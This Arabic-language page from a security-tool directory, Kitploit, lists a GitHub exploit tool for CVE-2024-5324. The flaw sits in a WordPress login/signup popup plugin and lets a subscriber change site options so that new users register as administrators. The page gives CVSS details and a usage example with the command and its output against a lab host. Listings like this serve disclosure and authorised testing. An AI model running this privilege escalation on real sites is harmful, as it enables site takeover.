Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-5324 — Login/Signup Popup ( Inline Form + Woocommerce ) 2.7.1 - 2.7.2 - تحديث خيارات تعسفي بدون تفويض | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-5324
المصادقة والترخيصتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبسوء التكوين
GitHubrandomrobbiebf/cve-2024-5324

CVE-2024-5324

Login/Signup Popup ( Inline Form + Woocommerce ) 2.7.1 - 2.7.2 - تحديث خيارات تعسفي بدون تفويض

عرض المستودع
13منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-5324

Login/Signup Popup ( Inline Form + Woocommerce ) 2.7.1 - 2.7.2 - فقدان التفويض لتحديث الخيارات العشوائية

الوصف:

إضافة Login/Signup Popup ( Inline Form + Woocommerce ) لووردبريس معرضة لتعديل غير مصرح به للبيانات بسبب عدم وجود فحص للصلاحية في دالة 'import_settings' في الإصدارات 2.7.1 إلى 2.7.2. وهذا يتيح للمهاجمين المُوثقين، بمستوى وصول المشترك فما فوق، تغيير خيارات عشوائية في المواقع المتأثرة. يمكن استخدام ذلك لتفعيل تسجيل مستخدمين جدد وتعيين الدور الافتراضي للمستخدمين الجدد كمسؤول.

root@kitploit:~
 Severity: high
 CVE ID: CVE-2024-5324
 CVSS Score: 8.8
 CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
 Plugin Slug: easy-login-woocommerce
 WPScan URL: https://www.wpscan.com/plugin/easy-login-woocommerce
 Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/005a27c6-b9eb-466c-b0c3-ce52c25bb321?source=api-prod

كيفية الاستخدام

root@kitploit:~
$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
You can now register a user on the as a admin.

$ python3 CVE-2024-5324.py --url http://wordpress.lan -un test -p test --fix e
The plugin version is 2.7.1.
Vulnerability check: http://wordpress.lan
Logged in successfully.
Option set successfully: http://wordpress.lan/wp-admin/admin-ajax.php
Options reset to default
تنزيل الأداة